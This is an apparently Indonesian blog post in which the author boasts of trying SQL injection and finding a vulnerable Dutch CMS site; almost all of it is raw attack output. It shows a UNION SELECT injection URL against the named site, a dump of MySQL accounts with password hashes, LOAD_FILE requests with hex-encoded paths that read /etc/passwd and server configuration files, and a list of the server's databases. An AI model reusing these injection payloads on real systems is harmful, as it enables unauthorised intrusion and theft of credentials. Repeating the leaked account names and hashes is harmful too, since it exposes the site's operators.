tadi malam ku coba memainkan sql inection eh gtaunya dapat situs kyk gini
http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+[t]
[+] Gathering MySQL Server Configuration...
Database: smartcms2
User: john@localhost
Version: 5.0.32-Debian_7etch5-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 21
[+] Do we have Access to MySQL Database: YES <-- w00t w00t [+] Dumping MySQL user info. host:user:password[+] Number of users in the mysql.user table: 11 [0] localhost:root:*10C72F131B136156D9133DB4961E9645CC09235B [1] pingie.nl:root:*10C72F131B136156D9133DB4961E9645CC09235B [2] localhost:debian-sys-maint:*6E9E0306B528A8DFCC43C912CEC0B671B41ACC5D [3] localhost:vftp:*10C72F131B136156D9133DB4961E9645CC09235B [4] localhost:john:*47B054FA00CEE26FC46D278F6C11A80B4DEFDE11 [5] localhost:udo:*DA13BEF6B903DB32D05747BD36F3CBD0EB8B9BC4 [6] %:udo:*DA13BEF6B903DB32D05747BD36F3CBD0EB8B9BC4 [7] localhost:paul:*5C16B82781A96DF1B275F5394283804B85D67D3D [8] %:paul:*5C16B82781A96DF1B275F5394283804B85D67D3D [9] localhost:mentor:*9F6B593979AA2ECAF97E07BA9247C371586E7DB9 [10] %:mentor:*9F6B593979AA2ECAF97E07BA9247C371586E7DB9 [+] Do we have Access to Load_File: YES <-- w00t w00t [+] Starting Load_File Fuzzer... [+] Number of tables names to be fuzzed: 236 [!] Found /etc/passwd [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764)-- [!] Found /etc/hosts [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f686f737473)-- [!] Found /etc/motd [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d6f7464)-- [!] Found /etc/fstab [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6673746162)-- [!] Found /etc/apache2/apache2.conf [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f617061636865322f617061636865322e636f6e66)-- [!] Found /etc/apache2/httpd.conf [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f6e66)-- [!] Found /etc/apache2/sites-available/default [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f617061636865322f73697465732d617661696c61626c652f64656661756c74)-- [!] Found /etc/mysql/my.cnf [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66)-- [!] Found /etc/pam.d/proftpd [!] http://www.smartcms.nl/cms2/sites/1038/index.php?idx=390+AND+1=2+UNION+SELECT+LOAD_FILE(0x2f6574632f70616d2e642f70726f66747064)-- dst..... [+] Showing all databases current user has access too! [+] Number of Databases: 21 [1]Smartpages_reseller [2]analysecms [3]analysestats [4]autos [5]doelgroeptv [6]gamebox [7]mysql [8]pinstok [9]pwcms [10]pwstats [11]smartcms [12]smartcms2 [13]smartcms2stats [14]sp-schiedam [15]stad [16]stem [17]sugar [18]udo [19]vhcs2 [20]wateen [21]youngstars databasenya aja segitu apalagi isinya?? tapi bahasanya lumayan sulit !! hehe
Langganan:
Posting Komentar (Atom)
0 Comment:
Posting Komentar